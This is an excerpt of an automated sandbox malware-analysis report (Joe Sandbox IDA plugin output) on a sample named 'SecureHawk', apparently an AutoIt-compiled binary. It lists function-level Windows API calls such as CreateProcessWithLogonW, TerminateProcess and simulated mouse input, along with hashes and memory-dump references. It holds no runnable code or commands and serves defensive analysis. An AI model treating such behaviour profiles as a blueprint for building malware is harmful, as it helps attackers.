                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                  • String ID:
                                  • API String ID: 1101466143-0
                                  • Opcode ID: 3eb9a116d3b636c5e183fb009247a655a8c27190dbca13e066a8341c14f2943e
                                  • Instruction ID: c32f73c20f07250687244009d42fc5cf064c4adb10a33a43453d822c297f9eca
                                  • Opcode Fuzzy Hash: 3eb9a116d3b636c5e183fb009247a655a8c27190dbca13e066a8341c14f2943e
                                  • Instruction Fuzzy Hash: 885138B5A00209AFDB15CF58C884AAAB7F8FF4D314F1585AAE959DB300D730E955CFA0
                                  APIs
                                  • _memset.LIBCMT ref: 0035286B
                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003528B6
                                  • IsMenu.USER32(00000000), ref: 003528D6
                                  • CreatePopupMenu.USER32 ref: 0035290A
                                  • GetMenuItemCount.USER32(000000FF), ref: 00352968
                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00352999
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                  • String ID:
                                  • API String ID: 3311875123-0
                                  • Opcode ID: 1e005cb708528ab13d2bfcf7f3125bc86a57607f038d2fb68058ed7566c2952a
                                  • Instruction ID: 809d045fbcae575decfbeeab3b6a729fbd5456cde1a9f8f967e0cc35ec26c99c
                                  • Opcode Fuzzy Hash: 1e005cb708528ab13d2bfcf7f3125bc86a57607f038d2fb68058ed7566c2952a
                                  • Instruction Fuzzy Hash: 8E519C7060420ADBDF26CF68C888FAFBBF8AF46315F144559EC519B3A0D3709958CB61
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 002F1B76
                                  • GetWindowRect.USER32(?,?), ref: 002F1BDA
                                  • ScreenToClient.USER32(?,?), ref: 002F1BF7
                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002F1C08
                                  • EndPaint.USER32(?,?), ref: 002F1C52
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                  • String ID:
                                  • API String ID: 1827037458-0
                                  • Opcode ID: dda0fea8ee930af0349da7cfc8c4ae718302240667f0ca560ae6609978ddc581
                                  • Instruction ID: b1c837ffb4f168f691113d5ffea3ee0eb53a445b803923f0548b64aee6ed3b24
                                  • Opcode Fuzzy Hash: dda0fea8ee930af0349da7cfc8c4ae718302240667f0ca560ae6609978ddc581
                                  • Instruction Fuzzy Hash: 8041EF30110308DFD712DF24DC85FBABBE8FB59764F140669FA94872A2C7309824DB62
                                  APIs
                                  • ShowWindow.USER32(003B67B0,00000000,01235888,?,?,003B67B0,?,0037B995,?,?), ref: 0037BAFF
                                  • EnableWindow.USER32(?,00000000), ref: 0037BB23
                                  • ShowWindow.USER32(003B67B0,00000000,01235888,?,?,003B67B0,?,0037B995,?,?), ref: 0037BB83
                                  • ShowWindow.USER32(?,00000004,?,0037B995,?,?), ref: 0037BB95
                                  • EnableWindow.USER32(?,00000001), ref: 0037BBB9
                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0037BBDC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$Show$Enable$MessageSend
                                  • String ID:
                                  • API String ID: 642888154-0
                                  • Opcode ID: 244660ae7c6c8406d1ec2236b68a463d0ce615f8a80954cc1dc4d35fd31e5251
                                  • Instruction ID: 2e39bbd489d1102bca6fa4ee85958e42eeed75e4a900a822597801100c146026
                                  • Opcode Fuzzy Hash: 244660ae7c6c8406d1ec2236b68a463d0ce615f8a80954cc1dc4d35fd31e5251
                                  • Instruction Fuzzy Hash: 6F411A34600244AFDB26CF24C889BA5BBF1FB05314F1981A9FD9C8F2A6C775A845CB91
                                  APIs
                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,003652F1,?,?,00000000,00000001), ref: 0036755B
                                    • Part of subcall function 00363E50: GetWindowRect.USER32(?,?), ref: 00363E63
                                  • GetDesktopWindow.USER32 ref: 00367585
                                  • GetWindowRect.USER32(00000000), ref: 0036758C
                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003675BE
                                    • Part of subcall function 0035566C: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003556E4
                                  • GetCursorPos.USER32(?), ref: 003675EA
                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00367648
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                  • String ID:
                                  • API String ID: 4137160315-0
                                  • Opcode ID: 3735889b9168ee8210ad23a7315bba0d28c93b9c21c8e2aa56ef522528fbada9
                                  • Instruction ID: 3e1ba9eae4da36109e9b62e6e3c1b25e5b2c3f99f5e319c004e7ca5a0547b307
                                  • Opcode Fuzzy Hash: 3735889b9168ee8210ad23a7315bba0d28c93b9c21c8e2aa56ef522528fbada9
                                  • Instruction Fuzzy Hash: 1931D072109305ABD725DF14C849E9BBBA9FF89318F004919F98997191DB30EA08CB96
                                  APIs
                                    • Part of subcall function 00348AAA: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00348AC1
                                    • Part of subcall function 00348AAA: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00348ACB
                                    • Part of subcall function 00348AAA: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00348ADA
                                    • Part of subcall function 00348AAA: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00348AE1
                                    • Part of subcall function 00348AAA: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00348AF7
                                  • GetLengthSid.ADVAPI32(?,00000000,00348E30), ref: 00349265
                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00349271
                                  • HeapAlloc.KERNEL32(00000000), ref: 00349278
                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00349291
                                  • GetProcessHeap.KERNEL32(00000000,00000000,00348E30), ref: 003492A5
                                  • HeapFree.KERNEL32(00000000), ref: 003492AC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                  • String ID:
                                  • API String ID: 3008561057-0
                                  • Opcode ID: 3bb8650c04134669564ee194ab48e8798a8e0fee75d00bbb44e4795aaae81702
                                  • Instruction ID: 88cbf83a99877609335bb70a6b4f272a7ff6f22551078a91f4e720490df6142a
                                  • Opcode Fuzzy Hash: 3bb8650c04134669564ee194ab48e8798a8e0fee75d00bbb44e4795aaae81702
                                  • Instruction Fuzzy Hash: 9D11A972600308FFDB569FA4CC09FAF7BACEB44325F10885AF845AB210C772A944DB60
                                  APIs
                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00348FE3
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00348FEA
                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00348FF9
                                  • CloseHandle.KERNEL32(00000004), ref: 00349004
                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00349033
                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00349047
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                  • String ID:
                                  • API String ID: 1413079979-0
                                  • Opcode ID: c54a4c9ac77dd2ba2124fd81fba49103f7eb4412bdc6220a1ddaf5698823c14c
                                  • Instruction ID: d21e8e765a62aed9f42683893a9056dad3a94609ce9804f8136f104ef80db2c9
                                  • Opcode Fuzzy Hash: c54a4c9ac77dd2ba2124fd81fba49103f7eb4412bdc6220a1ddaf5698823c14c
                                  • Instruction Fuzzy Hash: 4F115972501249EBDF528FA8ED49FDE7BADEF08304F054055FE04A6160C376AE68EB60
                                  APIs
                                  • GetDC.USER32(00000000), ref: 0034C131
                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0034C142
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0034C149
                                  • ReleaseDC.USER32(00000000,00000000), ref: 0034C151
                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0034C168
                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0034C17A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CapsDevice$Release
                                  • String ID:
                                  • API String ID: 1035833867-0
                                  • Opcode ID: bae3ee7a1d593f127789d2c6bfe349cf4d98724edb9a1802e6628ade2de017d1
                                  • Instruction ID: 1cb0ccfdbc5f77c5e61e598bee0cd1e705af60ca9cd8bed7e5c21d68ddd16018
                                  • Opcode Fuzzy Hash: bae3ee7a1d593f127789d2c6bfe349cf4d98724edb9a1802e6628ade2de017d1
                                  • Instruction Fuzzy Hash: 40018475E40308BBEB519BA59C49A5EBFFCEF48351F0040A5FA04AB281D6349D10CFA0
                                  APIs
                                    • Part of subcall function 002F16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002F1729
                                    • Part of subcall function 002F16CF: SelectObject.GDI32(?,00000000), ref: 002F1738
                                    • Part of subcall function 002F16CF: BeginPath.GDI32(?), ref: 002F174F
                                    • Part of subcall function 002F16CF: SelectObject.GDI32(?,00000000), ref: 002F1778
                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0037C2F7
                                  • LineTo.GDI32(00000000,00000003,?), ref: 0037C30B
                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0037C319
                                  • LineTo.GDI32(00000000,00000000,?), ref: 0037C329
                                  • EndPath.GDI32(00000000), ref: 0037C339
                                  • StrokePath.GDI32(00000000), ref: 0037C349
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                  • String ID:
                                  • API String ID: 43455801-0
                                  • Opcode ID: c07fb6e2f7ed2fea1c5aea6fa87d6c05650a2d579cb2740a080504a2cb8bdc2e
                                  • Instruction ID: 2cd3013febbc4f4b6016789ec8eea4e826c81d7b51bc57c7d5f5da78f41822f9
                                  • Opcode Fuzzy Hash: c07fb6e2f7ed2fea1c5aea6fa87d6c05650a2d579cb2740a080504a2cb8bdc2e
                                  • Instruction Fuzzy Hash: CE111E7600020CBFEF129F95DC88FEA7F6DEF08354F048055BA189A161C7719D59DBA0
                                  APIs
                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00310717
                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 0031071F
                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 0031072A
                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00310735
                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 0031073D
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00310745
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Virtual
                                  • String ID:
                                  • API String ID: 4278518827-0
                                  • Opcode ID: 9e47e8fd27201b1aa6f0b673f1020c9be0e62721931994082adf0c82aee4957c
                                  • Instruction ID: 5277f520a1beb2a0edea73a7fe70831c7ef5d0487f34208cc466052168e89d84
                                  • Opcode Fuzzy Hash: 9e47e8fd27201b1aa6f0b673f1020c9be0e62721931994082adf0c82aee4957c
                                  • Instruction Fuzzy Hash: A0016CB09017597DE3008F5A8C85B52FFA8FF59354F00415BA15C47941C7F5A868CBE5
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00355821
                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00355837
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00355846
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00355855
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0035585F
                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00355866
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                  • String ID:
                                  • API String ID: 839392675-0
                                  • Opcode ID: aca4f0314b32d89bd322f049ceee6154a2f4b8765154564a0ddd9bcebb80e5d2
                                  • Instruction ID: e3186b0990aec8c7e7d4dd3ef672689157f610bb70d296336814846ff05c708c
                                  • Opcode Fuzzy Hash: aca4f0314b32d89bd322f049ceee6154a2f4b8765154564a0ddd9bcebb80e5d2
                                  • Instruction Fuzzy Hash: 43F03036241258BBE7665B929C0DEEF7B7CEFC6B21F000199FA0491050E7A01A1587B5
                                  APIs
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0035766B
                                  • EnterCriticalSection.KERNEL32(?,?,002FC2B6,?,?), ref: 0035767C
                                  • TerminateThread.KERNEL32(00000000,000001F6,?,002FC2B6,?,?), ref: 00357689
                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,002FC2B6,?,?), ref: 00357696
                                    • Part of subcall function 0035705D: CloseHandle.KERNEL32(00000000,?,003576A3,?,002FC2B6,?,?), ref: 00357067
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 003576A9
                                  • LeaveCriticalSection.KERNEL32(?,?,002FC2B6,?,?), ref: 003576B0
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                  • String ID:
                                  • API String ID: 3495660284-0
                                  • Opcode ID: b2c1ee6cfeaa38cb4e81bb44ff88dd812bc15c29a57b3d4488f4f4d2069bbba5
                                  • Instruction ID: 08a146b7fba4c47aefd93c1db501b13513c7bc484ae8ea2183d756287f8bcd13
                                  • Opcode Fuzzy Hash: b2c1ee6cfeaa38cb4e81bb44ff88dd812bc15c29a57b3d4488f4f4d2069bbba5
                                  • Instruction Fuzzy Hash: 95F05E36145711ABD7572B64EC8CDAF777DFF45312F150862F602950B0CBB55809CB60
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00349338
                                  • UnloadUserProfile.USERENV(?,?), ref: 00349344
                                  • CloseHandle.KERNEL32(?), ref: 0034934D
                                  • CloseHandle.KERNEL32(?), ref: 00349355
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0034935E
                                  • HeapFree.KERNEL32(00000000), ref: 00349365
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                  • String ID:
                                  • API String ID: 146765662-0
                                  • Opcode ID: 71a4147cfbb9b400796517beecc4a0208771e2a0823b40875610ca47cdd95c8c
                                  • Instruction ID: c12abac6f86d6768a135c6d162cd45fd8c5db1f2fd0b21e2d6a63f1b01998d1f
                                  • Opcode Fuzzy Hash: 71a4147cfbb9b400796517beecc4a0208771e2a0823b40875610ca47cdd95c8c
                                  • Instruction Fuzzy Hash: CEE0E53A004301BBDB861FE1EC0C95ABF3DFF49722F104260F22581074CB72A468DB50
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 00368AC5
                                  • CharUpperBuffW.USER32(?,?), ref: 00368BD4
                                  • VariantClear.OLEAUT32(?), ref: 00368D4C
                                    • Part of subcall function 0035798A: VariantInit.OLEAUT32(00000000), ref: 003579CA
                                    • Part of subcall function 0035798A: VariantCopy.OLEAUT32(00000000,?), ref: 003579D3
                                    • Part of subcall function 0035798A: VariantClear.OLEAUT32(00000000), ref: 003579DF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                  • API String ID: 4237274167-1221869570
                                  • Opcode ID: a63d304328a6233c4a6822008af4a27898198856e344450327a23470b352c846
                                  • Instruction ID: 7859eb0e920c4f361691a1da3c8b8e607170e4d7070e09b8171fa6e6dce7217d
                                  • Opcode Fuzzy Hash: a63d304328a6233c4a6822008af4a27898198856e344450327a23470b352c846
                                  • Instruction Fuzzy Hash: F2918E716043059FC705EF24C48096BBBF8EF89354F148A6EF88A9B361DB31E945CB52
                                  APIs
                                    • Part of subcall function 0030436A: _wcscpy.LIBCMT ref: 0030438D
                                  • _memset.LIBCMT ref: 0035319B
                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003531CA
                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0035327D
                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003532AB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                  • String ID: 0
                                  • API String ID: 4152858687-4108050209
                                  • Opcode ID: 747ac30b6d87db64c03c55f1b6cdbc16672222e73d2353dcbbee3cd3689225c0
                                  • Instruction ID: c2c14a81795074f72feb78614d6d38f7541ddf104411935d9a89b53fe479451c
                                  • Opcode Fuzzy Hash: 747ac30b6d87db64c03c55f1b6cdbc16672222e73d2353dcbbee3cd3689225c0
                                  • Instruction Fuzzy Hash: BA51D1716087009AD71BEB28D845AABB7E8AF49391F050E2DFC95D71A1DB70CA488792
                                  APIs
                                  • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,003687D6,?,00000000), ref: 0037DCCE
                                  • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,003687D6,?,00000000,00000000), ref: 0037DD04
                                  • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0037DD15
                                  • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,003687D6,?,00000000,00000000), ref: 0037DD97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
